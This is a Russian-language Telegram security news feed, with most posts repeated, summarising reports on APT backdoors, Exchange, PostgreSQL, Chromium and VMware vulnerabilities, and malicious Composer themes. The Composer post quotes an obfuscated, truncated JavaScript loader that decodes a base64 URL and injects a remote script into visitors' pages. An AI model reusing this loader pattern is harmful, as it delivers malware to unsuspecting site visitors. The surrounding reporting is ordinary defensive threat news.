Toy Ghouls внедрили бэкдоры mqtt-bird и matrix-bird для атак на РФ
Группировка Toy Ghouls использует новый бэкдор с двумя версиями. Одна версия применяет MQTT-брокер HiveMQ для связи с C2-сервером, вторая — мессенджер Element. Обе версии содержат "bird" в названии: mqtt-bird-agent 0.1.0 и matrix-bird-agent 0.1.0.
Бэкдоры доставляются в системы через протокол Windows Remote Management (WinRM) с использованием инструментов Evil-WinRM и WinRM-fs. Установка возможна как в интерактивном режиме, так и в виде службы Windows. Конфигурационные файлы шифруются при первом запуске для привязки к конкретной машине.
ⓘ Что такое Toy Ghouls
Toy Ghouls — финансово мотивированная группировка, атакует российские организации с 2025 года. Изначально использовала инструменты из открытых репозиториев и утекшие билдеры шифровальщиков, позднее разработала собственный шифровальщик GenieLocker и бэкдоры.
Источник: Securelist
@cbunit
Группировка Toy Ghouls использует новый бэкдор с двумя версиями. Одна версия применяет MQTT-брокер HiveMQ для связи с C2-сервером, вторая — мессенджер Element. Обе версии содержат "bird" в названии: mqtt-bird-agent 0.1.0 и matrix-bird-agent 0.1.0.
Бэкдоры доставляются в системы через протокол Windows Remote Management (WinRM) с использованием инструментов Evil-WinRM и WinRM-fs. Установка возможна как в интерактивном режиме, так и в виде службы Windows. Конфигурационные файлы шифруются при первом запуске для привязки к конкретной машине.
ⓘ Что такое Toy Ghouls
Toy Ghouls — финансово мотивированная группировка, атакует российские организации с 2025 года. Изначально использовала инструменты из открытых репозиториев и утекшие билдеры шифровальщиков, позднее разработала собственный шифровальщик GenieLocker и бэкдоры.
Источник: Securelist
@cbunit
DPRK APT используют HAProxy и curlRAT для шпионажа за медиа и автопромом Южной Кореи
Исследователи Rapid7 обнаружили новый набор инструментов для Linux, нацеленный на южнокорейские медиа и автомобильную промышленность. Кампания использует бэкдор "ted backdoor" в HAProxy, а также троянизированные версии системных утилит.
Этот фреймворк позволяет злоумышленникам выполнять удаленные команды, внедрять вредоносные скрипты в веб-трафик, собирать учетные данные и вести долгосрочную слежку. Бэкдор "ted backdoor" интегрируется в HAProxy версии 2.8.12, используя его API для перехвата трафика и сокрытия от мониторинга.
Вместе с бэкдором используются SSH-кейлоггер и RAT на базе curl. Исследователи связывают эти атаки со средней степенью уверенности с северокорейскими APT-группировками, предполагая цели шпионажа. Кампании, вероятно, начались в начале 2025 года, а самые ранние загрузки на VirusTotal датируются серединой 2025 года.
ⓘ Что такое "ted backdoor"
"ted backdoor" — это вредоносный модуль, интегрированный в легитимный балансировщик нагрузки HAProxy. Он использует внутренние механизмы HAProxy для перехвата и анализа HTTP-трафика, кражи сессионных cookie и внедрения пользовательских скриптов на веб-страницы. Это позволяет злоумышленникам проводить атаки типа "watering hole" и собирать конфиденциальные данные.
Источник: Rapid7
@cbunit
Исследователи Rapid7 обнаружили новый набор инструментов для Linux, нацеленный на южнокорейские медиа и автомобильную промышленность. Кампания использует бэкдор "ted backdoor" в HAProxy, а также троянизированные версии системных утилит.
Этот фреймворк позволяет злоумышленникам выполнять удаленные команды, внедрять вредоносные скрипты в веб-трафик, собирать учетные данные и вести долгосрочную слежку. Бэкдор "ted backdoor" интегрируется в HAProxy версии 2.8.12, используя его API для перехвата трафика и сокрытия от мониторинга.
Вместе с бэкдором используются SSH-кейлоггер и RAT на базе curl. Исследователи связывают эти атаки со средней степенью уверенности с северокорейскими APT-группировками, предполагая цели шпионажа. Кампании, вероятно, начались в начале 2025 года, а самые ранние загрузки на VirusTotal датируются серединой 2025 года.
ⓘ Что такое "ted backdoor"
"ted backdoor" — это вредоносный модуль, интегрированный в легитимный балансировщик нагрузки HAProxy. Он использует внутренние механизмы HAProxy для перехвата и анализа HTTP-трафика, кражи сессионных cookie и внедрения пользовательских скриптов на веб-страницы. Это позволяет злоумышленникам проводить атаки типа "watering hole" и собирать конфиденциальные данные.
Источник: Rapid7
@cbunit
Уязвимость в Microsoft Exchange позволяет обходить аутентификацию — эксплойт опубликован
Microsoft выпустила исправление для уязвимости CVE-2026-62911 в Exchange Server 2016, 2019 и Subscription Edition. Уязвимость с оценкой CVSS 8.0 позволяет обходить аутентификацию и получать полный контроль над почтовыми ящиками.
По состоянию на 1 сентября 2026 года около 22 000 серверов Exchange остаются неисправленными и доступными из интернета. Эксплуатационный код уязвимости уже опубликован. Национальный центр кибербезопасности Нидерландов (NCSC-NL) рекомендует сделать серверы Exchange недоступными из интернета до установки патча.
ⓘ Уязвимость CVE-2026-62911
CVE-2026-62911 — это уязвимость обхода аутентификации в Microsoft Exchange Server. Её успешная эксплуатация позволяет злоумышленнику с базовыми привилегиями получить полный контроль над всеми почтовыми ящиками на целевом сервере, включая чтение и отправку писем, а также загрузку вложений. Уязвимость имеет высокий уровень серьёзности с оценкой CVSS 8.0.
Источник: Zscaler ThreatLabz
@cbunit
Microsoft выпустила исправление для уязвимости CVE-2026-62911 в Exchange Server 2016, 2019 и Subscription Edition. Уязвимость с оценкой CVSS 8.0 позволяет обходить аутентификацию и получать полный контроль над почтовыми ящиками.
По состоянию на 1 сентября 2026 года около 22 000 серверов Exchange остаются неисправленными и доступными из интернета. Эксплуатационный код уязвимости уже опубликован. Национальный центр кибербезопасности Нидерландов (NCSC-NL) рекомендует сделать серверы Exchange недоступными из интернета до установки патча.
ⓘ Уязвимость CVE-2026-62911
CVE-2026-62911 — это уязвимость обхода аутентификации в Microsoft Exchange Server. Её успешная эксплуатация позволяет злоумышленнику с базовыми привилегиями получить полный контроль над всеми почтовыми ящиками на целевом сервере, включая чтение и отправку писем, а также загрузку вложений. Уязвимость имеет высокий уровень серьёзности с оценкой CVSS 8.0.
Источник: Zscaler ThreatLabz
@cbunit
Уязвимость в PostgreSQL PostGREShell даёт полный контроль над сервером
Обнаружена 12-летняя уязвимость в PostgreSQL под названием PostGREShell (CVE-2026-6471). Она позволяет получить удалённое выполнение кода и постоянные права суперпользователя через доступ к репликации.
Уязвимость затрагивает версии PostgreSQL, использующие низкоуровневый доступ к репликации. Эксплуатация PostGREShell создаёт бэкдор в базе данных, обеспечивая постоянный доступ к серверу.
ⓘ Что такое PostGREShell
PostGREShell — это уязвимость в системе управления базами данных PostgreSQL, позволяющая злоумышленникам получить полный контроль над сервером. Она использует низкоуровневый доступ к механизму репликации для выполнения произвольного кода и установки бэкдора.
Источники: SecurityWeek · Security Affairs
@cbunit
Обнаружена 12-летняя уязвимость в PostgreSQL под названием PostGREShell (CVE-2026-6471). Она позволяет получить удалённое выполнение кода и постоянные права суперпользователя через доступ к репликации.
Уязвимость затрагивает версии PostgreSQL, использующие низкоуровневый доступ к репликации. Эксплуатация PostGREShell создаёт бэкдор в базе данных, обеспечивая постоянный доступ к серверу.
ⓘ Что такое PostGREShell
PostGREShell — это уязвимость в системе управления базами данных PostgreSQL, позволяющая злоумышленникам получить полный контроль над сервером. Она использует низкоуровневый доступ к механизму репликации для выполнения произвольного кода и установки бэкдора.
❝Dubbed PostGREShell, CVE-2026-6471 turns low-level replication access into code execution, permanent superuser privileges and a persistent database backdoor.❞
— SecurityWeek
Источники: SecurityWeek · Security Affairs
@cbunit
Boeing 737 взломали через порт: атака Bus Driver подменяет данные полета
Источник: Kaspersky Daily
@cbunit
Источник: Kaspersky Daily
@cbunit
#дайджест
Главное к исходу пятницы (04.09):
🔸 Коммутаторы Cisco Nexus 9000 уязвимы к удалённому выполнению кода через Silicon One
🔸 Минцифры России обновит классификатор ПО для защиты информации
🔸 Пароли в Active Directory: как угадать «сложный» пароль сотрудника
🔸 Уязвимость в Microsoft Exchange позволяет обходить аутентификацию — эксплойт опубликован
Главное к исходу пятницы (04.09):
🔸 Коммутаторы Cisco Nexus 9000 уязвимы к удалённому выполнению кода через Silicon One
🔸 Минцифры России обновит классификатор ПО для защиты информации
🔸 Пароли в Active Directory: как угадать «сложный» пароль сотрудника
🔸 Уязвимость в Microsoft Exchange позволяет обходить аутентификацию — эксплойт опубликован
❢ Google Chromium V8: CISA добавила уязвимость подмены типов в каталог KEV
CISA добавила одну новую уязвимость в каталог известных эксплуатируемых уязвимостей (KEV) из-за доказательств её активной эксплуатации.
Уязвимость CVE-2026-85046 относится к Google Chromium V8 и представляет собой подмену типов. Этот тип уязвимостей является частым вектором атак и создаёт значительные риски для федеральных систем.
ⓘ Google Chromium V8 Type Confusion Vulnerability
Уязвимость типа «подмена типов» (Type Confusion) в движке V8 браузера Google Chromium позволяет злоумышленникам манипулировать типами данных, что может привести к выполнению произвольного кода или другим опасным последствиям.
Источники: CISA · Help Net Security
@cbunit
CISA добавила одну новую уязвимость в каталог известных эксплуатируемых уязвимостей (KEV) из-за доказательств её активной эксплуатации.
Уязвимость CVE-2026-85046 относится к Google Chromium V8 и представляет собой подмену типов. Этот тип уязвимостей является частым вектором атак и создаёт значительные риски для федеральных систем.
ⓘ Google Chromium V8 Type Confusion Vulnerability
Уязвимость типа «подмена типов» (Type Confusion) в движке V8 браузера Google Chromium позволяет злоумышленникам манипулировать типами данных, что может привести к выполнению произвольного кода или другим опасным последствиям.
Источники: CISA · Help Net Security
@cbunit
Вредоносные темы Composer доставляют шпионское ПО для кражи криптокошельков с iPhone
▤ Разбор
Исследователи Socket обнаружили 13 вредоносных тем Composer на Packagist, которые внедряют JavaScript на сайты с фильмами и комиксами во Вьетнаме. Вредоносный код выполняет две операции: запускает цепочку мошенничества с рекламой и перенаправлением на азартные игры, а также устанавливает шпионское ПО на iPhone через эксплойт WebKit-to-kernel.
Apple подтвердила, что уязвимость ядра была исправлена до получения отчёта, а точки входа WebKit общедоступны и внесены в каталог CISA "Уязвимости, эксплуатируемые прямо сейчас" (KEV). Ранее исследователи Socket сообщали о шести темах под одним вендором (ophimcms), теперь подтверждённый набор расширен до 13 пакетов от пяти вендоров.
ⓘ Что такое Composer
Composer — это инструмент управления зависимостями для PHP. Он позволяет разработчикам указывать, какие библиотеки нужны их проекту, и устанавливать их. Вредоносные темы Composer, обнаруженные исследователями, представляют собой пакеты, которые злоумышленники модифицировали, чтобы внедрить вредоносный JavaScript на сайты, использующие эти темы.
Источник: Socket
@cbunit
▤ Разбор
Исследователи Socket обнаружили 13 вредоносных тем Composer на Packagist, которые внедряют JavaScript на сайты с фильмами и комиксами во Вьетнаме. Вредоносный код выполняет две операции: запускает цепочку мошенничества с рекламой и перенаправлением на азартные игры, а также устанавливает шпионское ПО на iPhone через эксплойт WebKit-to-kernel.
Apple подтвердила, что уязвимость ядра была исправлена до получения отчёта, а точки входа WebKit общедоступны и внесены в каталог CISA "Уязвимости, эксплуатируемые прямо сейчас" (KEV). Ранее исследователи Socket сообщали о шести темах под одним вендором (ophimcms), теперь подтверждённый набор расширен до 13 пакетов от пяти вендоров.
ⓘ Что такое Composer
Composer — это инструмент управления зависимостями для PHP. Он позволяет разработчикам указывать, какие библиотеки нужны их проекту, и устанавливать их. Вредоносные темы Composer, обнаруженные исследователями, представляют собой пакеты, которые злоумышленники модифицировали, чтобы внедрить вредоносный JavaScript на сайты, использующие эти темы.
eval('window')['KuCbGF']=function(){ (function(u,r,w,d,f,c){
var x = iScfnleC; u = decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));
var s = d.createElement('script'); s.src=u; d.getElementsByTagName('head')[0].appendChild(s)
})('aHR0cHM6Ly91bmlvbi5tYWNvbXMubGEvanF1ZXJ5Lm1pbi0zLjYuOC5qcw==', ...) };
if( !(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1) ) KuCbGF();Источник: Socket
@cbunit
Минцифры предложило требования по защите от НСД к системам ОРД
Минцифры России разработало проект требований по защите от несанкционированного доступа к техническим и программным средствам информационных систем. Документ касается средств, используемых при проведении оперативно-разыскных мероприятий или обеспечении безопасности РФ.
Проект направлен на независимую антикоррупционную экспертизу. Он устанавливает правила защиты информации в системах, применяемых уполномоченными органами.
Источник: regulation.gov.ru
@cbunit
Минцифры России разработало проект требований по защите от несанкционированного доступа к техническим и программным средствам информационных систем. Документ касается средств, используемых при проведении оперативно-разыскных мероприятий или обеспечении безопасности РФ.
Проект направлен на независимую антикоррупционную экспертизу. Он устанавливает правила защиты информации в системах, применяемых уполномоченными органами.
Источник: regulation.gov.ru
@cbunit
Broadcom закрыла критические VM-escape уязвимости в VMware Workstation и Fusion
Broadcom устранила две уязвимости в VMware Workstation и Fusion, позволяющие атакующему из виртуальной машины выполнить код на хосте. Одна из уязвимостей получила критический рейтинг.
Проблемы затрагивают версии VMware Workstation и Fusion 25H2 и 26H1. Обновление до версии 26H1u1 устраняет обе уязвимости. Обходных путей для эксплуатации не существует.
ⓘ Что такое VM-escape
VM-escape — это тип атаки, при котором злоумышленник, получивший контроль над виртуальной машиной, может выйти за её пределы и получить доступ к хостовой системе или другим виртуальным машинам на том же оборудовании. Это происходит из-за ошибок в гипервизоре или компонентах, связывающих гостевую ОС с хостом.
Источники: Security Affairs · The Hacker News
@cbunit
Broadcom устранила две уязвимости в VMware Workstation и Fusion, позволяющие атакующему из виртуальной машины выполнить код на хосте. Одна из уязвимостей получила критический рейтинг.
Проблемы затрагивают версии VMware Workstation и Fusion 25H2 и 26H1. Обновление до версии 26H1u1 устраняет обе уязвимости. Обходных путей для эксплуатации не существует.
ⓘ Что такое VM-escape
VM-escape — это тип атаки, при котором злоумышленник, получивший контроль над виртуальной машиной, может выйти за её пределы и получить доступ к хостовой системе или другим виртуальным машинам на том же оборудовании. Это происходит из-за ошибок в гипервизоре или компонентах, связывающих гостевую ОС с хостом.
Источники: Security Affairs · The Hacker News
@cbunit
Zscaler: ИИ-атаки ускоряются, готовность компаний — на нуле
▤ Разбор · 29 дней назад
Zscaler ThreatLabz опубликовал отчёт о готовности предприятий к автономным кибератакам с использованием передовых моделей ИИ.
Исследование выявило средний балл готовности 37 из 100, при этом оценка управления ИИ составила всего 2,1 из 20. Большинство организаций имеют уязвимые VPN-подключения, неинспектируемый трафик и широкие настройки сегментации, что создаёт благоприятные условия для атак.
Отчёт предлагает архитектурный подход к защите, основанный на принципах Zero Trust, для нейтрализации преимуществ ИИ в скорости атак. Рекомендуется в течение 90 дней усилить контроль над сетевыми устройствами, изолировать VPN, обеспечить идентификационную аутентификацию для ИИ-систем и увеличить долю инспектируемого зашифрованного трафика.
ⓘ Что такое Frontier AI
Frontier AI — это передовые, высокопроизводительные фундаментальные модели, расширяющие границы искусственного интеллекта. В отличие от традиционного узкого ИИ, эти модели обладают сложными возможностями рассуждения, планирования и автономного выполнения задач. В руках злоумышленников они могут находить мелкие уязвимости и объединять их в полные пути атак со скоростью машины.
Источник: Zscaler ThreatLabz
@cbunit
▤ Разбор · 29 дней назад
Zscaler ThreatLabz опубликовал отчёт о готовности предприятий к автономным кибератакам с использованием передовых моделей ИИ.
Исследование выявило средний балл готовности 37 из 100, при этом оценка управления ИИ составила всего 2,1 из 20. Большинство организаций имеют уязвимые VPN-подключения, неинспектируемый трафик и широкие настройки сегментации, что создаёт благоприятные условия для атак.
Отчёт предлагает архитектурный подход к защите, основанный на принципах Zero Trust, для нейтрализации преимуществ ИИ в скорости атак. Рекомендуется в течение 90 дней усилить контроль над сетевыми устройствами, изолировать VPN, обеспечить идентификационную аутентификацию для ИИ-систем и увеличить долю инспектируемого зашифрованного трафика.
ⓘ Что такое Frontier AI
Frontier AI — это передовые, высокопроизводительные фундаментальные модели, расширяющие границы искусственного интеллекта. В отличие от традиционного узкого ИИ, эти модели обладают сложными возможностями рассуждения, планирования и автономного выполнения задач. В руках злоумышленников они могут находить мелкие уязвимости и объединять их в полные пути атак со скоростью машины.
Источник: Zscaler ThreatLabz
@cbunit
#дайджест
Главное за неделю (30.08–05.09):
🔸 Google Chromium V8: CISA добавила уязвимость подмены типов в каталог KEV
🔸 Коммутаторы Cisco Nexus 9000 уязвимы к удалённому выполнению кода через Silicon One
🔸 Зловред для авто: заражение через обновления мультимедиа-систем Android
🔸 Cisco устранила внутренние уязвимости в Secure Workload
🔸 Cisco устранила внутренние уязвимости в IOS XR Software
🔸 Microsoft выпустила рекордные 208 CVE в июньском бюллетене безопасности
Главное за неделю (30.08–05.09):
🔸 Google Chromium V8: CISA добавила уязвимость подмены типов в каталог KEV
🔸 Коммутаторы Cisco Nexus 9000 уязвимы к удалённому выполнению кода через Silicon One
🔸 Зловред для авто: заражение через обновления мультимедиа-систем Android
🔸 Cisco устранила внутренние уязвимости в Secure Workload
🔸 Cisco устранила внутренние уязвимости в IOS XR Software
🔸 Microsoft выпустила рекордные 208 CVE в июньском бюллетене безопасности